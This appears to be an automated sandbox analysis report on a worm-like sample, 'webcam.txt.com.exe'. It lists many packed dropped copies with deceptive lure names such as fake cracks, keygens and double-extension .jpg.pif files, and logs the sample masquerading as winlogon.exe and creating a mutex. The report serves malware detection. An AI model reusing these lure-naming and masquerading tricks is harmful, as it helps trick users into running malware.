Source: DivX 7.0 final.exe0.0.drStatic PE information: section name:
Source: Clone DVD 5.exe1.0.drStatic PE information: section name:
Source: Clone DVD 5.exe1.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe0.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe0.0.drStatic PE information: section name:
Source: Ulead Keygen.exe0.0.drStatic PE information: section name:
Source: Ulead Keygen.exe0.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe1.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe1.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe0.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe0.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif1.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif1.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe0.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe0.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe1.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe1.0.drStatic PE information: section name:
Source: Opera.exe1.0.drStatic PE information: section name:
Source: Opera.exe1.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe0.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe0.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe1.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe1.0.drStatic PE information: section name:
Source: Serials.txt.exe3.0.drStatic PE information: section name:
Source: Serials.txt.exe3.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe2.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe2.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe1.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe0.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe0.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe1.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe1.0.drStatic PE information: section name:
Source: Dark Angels.pif1.0.drStatic PE information: section name:
Source: Dark Angels.pif1.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe2.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe2.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe1.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe1.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif2.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif2.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe3.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe3.0.drStatic PE information: section name:
Source: Ulead Keygen.exe1.0.drStatic PE information: section name:
Source: Ulead Keygen.exe1.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe1.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe1.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe1.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe1.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe3.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe3.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif3.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif3.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe3.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe3.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe2.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe2.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe2.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe2.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe2.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe2.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif4.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif4.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe2.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe2.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe4.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe4.0.drStatic PE information: section name:
Source: Dark Angels.pif2.0.drStatic PE information: section name:
Source: Dark Angels.pif2.0.drStatic PE information: section name:
Source: Full album.mp3.pif3.0.drStatic PE information: section name:
Source: Full album.mp3.pif3.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe3.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe3.0.drStatic PE information: section name:
Source: Serials.txt.exe4.0.drStatic PE information: section name:
Source: Serials.txt.exe4.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe4.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe4.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe3.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe3.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe5.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe5.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe3.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe3.0.drStatic PE information: section name:
Source: Dark Angels.pif3.0.drStatic PE information: section name:
Source: Dark Angels.pif3.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe3.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe3.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe1.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe1.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe3.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe3.0.drStatic PE information: section name:
Source: Opera.exe2.0.drStatic PE information: section name:
Source: Opera.exe2.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe4.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe4.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe2.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe2.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe2.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe2.0.drStatic PE information: section name:
Source: Ulead Keygen.exe2.0.drStatic PE information: section name:
Source: Ulead Keygen.exe2.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe2.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe2.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe2.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe2.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe2.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe2.0.drStatic PE information: section name:
Source: Serials.txt.exe5.0.drStatic PE information: section name:
Source: Serials.txt.exe5.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe4.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe4.0.drStatic PE information: section name:
Source: Full album.mp3.pif4.0.drStatic PE information: section name:
Source: Full album.mp3.pif4.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe4.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe4.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe4.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe4.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe3.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe3.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif5.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif5.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe5.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe5.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe4.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe4.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe5.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe5.0.drStatic PE information: section name:
Source: Ulead Keygen.exe3.0.drStatic PE information: section name:
Source: Ulead Keygen.exe3.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe5.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe5.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe2.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe2.0.drStatic PE information: section name:
Source: Clone DVD 5.exe2.0.drStatic PE information: section name:
Source: Clone DVD 5.exe2.0.drStatic PE information: section name:
Source: C:\Users\user\Desktop\webcam.txt.com.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Windows\winlogon.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile deleted: C:\Windows\ranking.zipJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004016910_2_00401691
Source: C:\Windows\winlogon.exeCode function: 1_2_004016911_2_00401691
Source: webcam.txt.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@2/1025@150/17
Source: C:\Users\user\Desktop\webcam.txt.com.exeMutant created: \Sessions\1\BaseNamedObjects\[SkyNet.cz]SystemsMutex
Source: C:\Users\user\Desktop\webcam.txt.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: webcam.txt.com.exeReversingLabs: Detection: 94%
Source: webcam.txt.com.exeVirustotal: Detection: 93%
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile read: C:\Users\user\Desktop\webcam.txt.com.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\webcam.txt.com.exe C:\Users\user\Desktop\webcam.txt.com.exe
Source: unknownProcess created: C:\Windows\winlogon.exe "C:\Windows\winlogon.exe" -stealth
Source: C:\Users\user\Desktop\webcam.txt.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\webcam.txt.com.exeUnpacked PE file: 0.2.webcam.txt.com.exe.400000.0.unpack
Source: C:\Windows\winlogon.exeUnpacked PE file: 1.2.winlogon.exe.400000.0.unpack
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004057EB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004057EB
Source: webcam.txt.com.exeStatic PE information: section name:
Source: webcam.txt.com.exeStatic PE information: section name: .petite
Source: webcam.txt.com.exeStatic PE information: section name:
Source: Ahead Nero 7.exe.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe.0.drStatic PE information: section name: .petite
Source: Ahead Nero 7.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe.0.drStatic PE information: section name: .petite
Source: Microsoft Office 2003 Crack.exe.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif.0.drStatic PE information: section name: .petite
Source: Teen Porn 16.jpg.pif.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe.0.drStatic PE information: section name: .petite
Source: XXX hardcore pic.jpg.exe.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe.0.drStatic PE information: section name: .petite
Source: Microsoft WinXP Crack.exe.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe.0.drStatic PE information: section name: .petite
Source: The Sims 3 crack.exe.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe.0.drStatic PE information: section name: .petite
Source: Lightwave SE Update.exe.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe.0.drStatic PE information: section name: .petite
Source: Adobe Photoshop 9 full.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe0.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe0.0.drStatic PE information: section name: .petite
Source: Microsoft Office 2003 Crack.exe0.0.drStatic PE information: section name:
Source: Serials.txt.exe.0.drStatic PE information: section name:
Source: Serials.txt.exe.0.drStatic PE information: section name: .petite
Source: Serials.txt.exe.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe.0.drStatic PE information: section name: .petite
Source: Adobe Premiere 9.exe.0.drStatic PE information: section name:
Source: Dark Angels.pif.0.drStatic PE information: section name:
Source: Dark Angels.pif.0.drStatic PE information: section name: .petite
Source: Dark Angels.pif.0.drStatic PE information: section name:
Source: Full album.mp3.pif.0.drStatic PE information: section name:
Source: Full album.mp3.pif.0.drStatic PE information: section name: .petite
Source: Full album.mp3.pif.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe.0.drStatic PE information: section name: .petite
Source: Learn Programming.doc.exe.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe.0.drStatic PE information: section name: .petite
Source: WinXP eBook.doc.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe1.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe1.0.drStatic PE information: section name: .petite
Source: Microsoft Office 2003 Crack.exe1.0.drStatic PE information: section name:
Source: winlogon.exe.0.drStatic PE information: section name:
Source: winlogon.exe.0.drStatic PE information: section name: .petite
Source: winlogon.exe.0.drStatic PE information: section name:
Source: Dark Angels.pif0.0.drStatic PE information: section name:
Source: Dark Angels.pif0.0.drStatic PE information: section name: .petite
Source: Dark Angels.pif0.0.drStatic PE information: section name:
Source: Opera.exe.0.drStatic PE information: section name:
Source: Opera.exe.0.drStatic PE information: section name: .petite
Source: Opera.exe.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe0.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe0.0.drStatic PE information: section name: .petite
Source: Microsoft WinXP Crack.exe0.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif0.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif0.0.drStatic PE information: section name: .petite
Source: Teen Porn 16.jpg.pif0.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe0.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe0.0.drStatic PE information: section name: .petite
Source: Adobe Photoshop 9 full.exe0.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe0.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe0.0.drStatic PE information: section name: .petite
Source: Adobe Premiere 9.exe0.0.drStatic PE information: section name:
Source: Serials.txt.exe0.0.drStatic PE information: section name:
Source: Serials.txt.exe0.0.drStatic PE information: section name: .petite
Source: Serials.txt.exe0.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe.0.drStatic PE information: section name: .petite
Source: E-Book Archive.rtf.exe.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe.0.drStatic PE information: section name: .petite
Source: Doom 3 Beta.exe.0.drStatic PE information: section name:
Source: Full album.mp3.pif0.0.drStatic PE information: section name:
Source: Full album.mp3.pif0.0.drStatic PE information: section name: .petite
Source: Full album.mp3.pif0.0.drStatic PE information: section name:
Source: How to hack.doc.exe.0.drStatic PE information: section name:
Source: How to hack.doc.exe.0.drStatic PE information: section name: .petite
Source: How to hack.doc.exe.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe0.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe0.0.drStatic PE information: section name: .petite
Source: XXX hardcore pic.jpg.exe0.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe0.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe0.0.drStatic PE information: section name: .petite
Source: Ahead Nero 7.exe0.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe.0.drStatic PE information: section name: .petite
Source: 1000 Sex and more.rtf.exe.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe0.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe0.0.drStatic PE information: section name: .petite
Source: WinXP eBook.doc.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe.0.drStatic PE information: section name: .petite
Source: 3D Studio Max 3dsmax.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe.0.drStatic PE information: section name: .petite
Source: Win Longhorn Beta.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe2.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe2.0.drStatic PE information: section name: .petite
Source: Microsoft Office 2003 Crack.exe2.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe1.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe1.0.drStatic PE information: section name: .petite
Source: Ahead Nero 7.exe1.0.drStatic PE information: section name:
Source: Full album.mp3.pif1.0.drStatic PE information: section name:
Source: Full album.mp3.pif1.0.drStatic PE information: section name: .petite
Source: Full album.mp3.pif1.0.drStatic PE information: section name:
Source: Serials.txt.exe1.0.drStatic PE information: section name:
Source: Serials.txt.exe1.0.drStatic PE information: section name: .petite
Source: Serials.txt.exe1.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe0.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe0.0.drStatic PE information: section name: .petite
Source: E-Book Archive.rtf.exe0.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe0.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe0.0.drStatic PE information: section name: .petite
Source: Win Longhorn Beta.exe0.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe0.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe0.0.drStatic PE information: section name: .petite
Source: Doom 3 Beta.exe0.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe.0.drStatic PE information: section name: .petite
Source: Dictionary English - France.doc.exe.0.drStatic PE information: section name:
Source: How to hack.doc.exe0.0.drStatic PE information: section name:
Source: How to hack.doc.exe0.0.drStatic PE information: section name: .petite
Source: How to hack.doc.exe0.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe.0.drStatic PE information: section name: .petite
Source: RFC Basics Full Edition.doc.exe.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe0.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe0.0.drStatic PE information: section name: .petite
Source: Learn Programming.doc.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe0.0.drStatic PE information: section name: .petite
Source: 3D Studio Max 3dsmax.exe0.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe.0.drStatic PE information: section name: .petite
Source: Keygen 4 all appz.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe1.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe1.0.drStatic PE information: section name: .petite
Source: Win Longhorn Beta.exe1.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe1.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe1.0.drStatic PE information: section name: .petite
Source: WinXP eBook.doc.exe1.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe2.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe2.0.drStatic PE information: section name: .petite
Source: Ahead Nero 7.exe2.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe1.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe1.0.drStatic PE information: section name: .petite
Source: Learn Programming.doc.exe1.0.drStatic PE information: section name:
Source: Full album.mp3.pif2.0.drStatic PE information: section name:
Source: Full album.mp3.pif2.0.drStatic PE information: section name: .petite
Source: Full album.mp3.pif2.0.drStatic PE information: section name:
Source: How to hack.doc.exe1.0.drStatic PE information: section name:
Source: How to hack.doc.exe1.0.drStatic PE information: section name: .petite
Source: How to hack.doc.exe1.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe1.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe1.0.drStatic PE information: section name: .petite
Source: Doom 3 Beta.exe1.0.drStatic PE information: section name:
Source: Serials.txt.exe2.0.drStatic PE information: section name:
Source: Serials.txt.exe2.0.drStatic PE information: section name: .petite
Source: Serials.txt.exe2.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe1.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe1.0.drStatic PE information: section name: .petite
Source: E-Book Archive.rtf.exe1.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe0.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe0.0.drStatic PE information: section name: .petite
Source: Keygen 4 all appz.exe0.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe0.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe0.0.drStatic PE information: section name: .petite
Source: Dictionary English - France.doc.exe0.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe.0.drStatic PE information: section name: .petite
Source: Windows Sourcecode.doc.exe.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe0.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe0.0.drStatic PE information: section name: .petite
Source: RFC Basics Full Edition.doc.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe.0.drStatic PE information: section name: .petite
Source: Norton Antivirus 2004.exe.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe0.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe0.0.drStatic PE information: section name: .petite
Source: 1000 Sex and more.rtf.exe0.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe.0.drStatic PE information: section name: .petite
Source: Partitionsmagic 9.0.exe.0.drStatic PE information: section name:
Source: Star Office 8.exe.0.drStatic PE information: section name:
Source: Star Office 8.exe.0.drStatic PE information: section name: .petite
Source: Star Office 8.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe.0.drStatic PE information: section name: .petite
Source: Magix Video Deluxe 4.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe2.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe2.0.drStatic PE information: section name: .petite
Source: Win Longhorn Beta.exe2.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe1.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe1.0.drStatic PE information: section name: .petite
Source: Keygen 4 all appz.exe1.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe2.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe2.0.drStatic PE information: section name: .petite
Source: WinXP eBook.doc.exe2.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe1.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe1.0.drStatic PE information: section name: .petite
Source: 3D Studio Max 3dsmax.exe1.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe2.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe2.0.drStatic PE information: section name: .petite
Source: Learn Programming.doc.exe2.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe1.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe1.0.drStatic PE information: section name: .petite
Source: 1000 Sex and more.rtf.exe1.0.drStatic PE information: section name:
Source: How to hack.doc.exe2.0.drStatic PE information: section name:
Source: How to hack.doc.exe2.0.drStatic PE information: section name: .petite
Source: How to hack.doc.exe2.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe1.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe1.0.drStatic PE information: section name: .petite
Source: RFC Basics Full Edition.doc.exe1.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe2.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe2.0.drStatic PE information: section name: .petite
Source: Doom 3 Beta.exe2.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe1.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe1.0.drStatic PE information: section name: .petite
Source: Dictionary English - France.doc.exe1.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe2.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe2.0.drStatic PE information: section name: .petite
Source: E-Book Archive.rtf.exe2.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe0.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe0.0.drStatic PE information: section name: .petite
Source: Windows Sourcecode.doc.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe0.0.drStatic PE information: section name: .petite
Source: Norton Antivirus 2004.exe0.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe.0.drStatic PE information: section name: .petite
Source: Gimp 1.5 Full with Key.exe.0.drStatic PE information: section name:
Source: ACDSee 9.exe.0.drStatic PE information: section name:
Source: ACDSee 9.exe.0.drStatic PE information: section name: .petite
Source: ACDSee 9.exe.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe.0.drStatic PE information: section name: .petite
Source: Visual Studio Net Crack.exe.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe.0.drStatic PE information: section name: .petite
Source: Cracks & Warez Archive.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe0.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe0.0.drStatic PE information: section name: .petite
Source: Magix Video Deluxe 4.exe0.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe2.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe2.0.drStatic PE information: section name: .petite
Source: Keygen 4 all appz.exe2.0.drStatic PE information: section name:
Source: Star Office 8.exe0.0.drStatic PE information: section name:
Source: Star Office 8.exe0.0.drStatic PE information: section name: .petite
Source: Star Office 8.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe2.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe2.0.drStatic PE information: section name: .petite
Source: 3D Studio Max 3dsmax.exe2.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe0.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe0.0.drStatic PE information: section name: .petite
Source: Partitionsmagic 9.0.exe0.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe2.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe2.0.drStatic PE information: section name: .petite
Source: 1000 Sex and more.rtf.exe2.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe0.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe0.0.drStatic PE information: section name: .petite
Source: Gimp 1.5 Full with Key.exe0.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe2.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe2.0.drStatic PE information: section name: .petite
Source: RFC Basics Full Edition.doc.exe2.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe1.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe1.0.drStatic PE information: section name: .petite
Source: Norton Antivirus 2004.exe1.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe2.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe2.0.drStatic PE information: section name: .petite
Source: Dictionary English - France.doc.exe2.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe1.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe1.0.drStatic PE information: section name: .petite
Source: Windows Sourcecode.doc.exe1.0.drStatic PE information: section name:
Source: Clone DVD 5.exe.0.drStatic PE information: section name:
Source: Clone DVD 5.exe.0.drStatic PE information: section name: .petite
Source: Clone DVD 5.exe.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe.0.drStatic PE information: section name: .petite
Source: MS Service Pack 5.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe1.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe1.0.drStatic PE information: section name: .petite
Source: Magix Video Deluxe 4.exe1.0.drStatic PE information: section name:
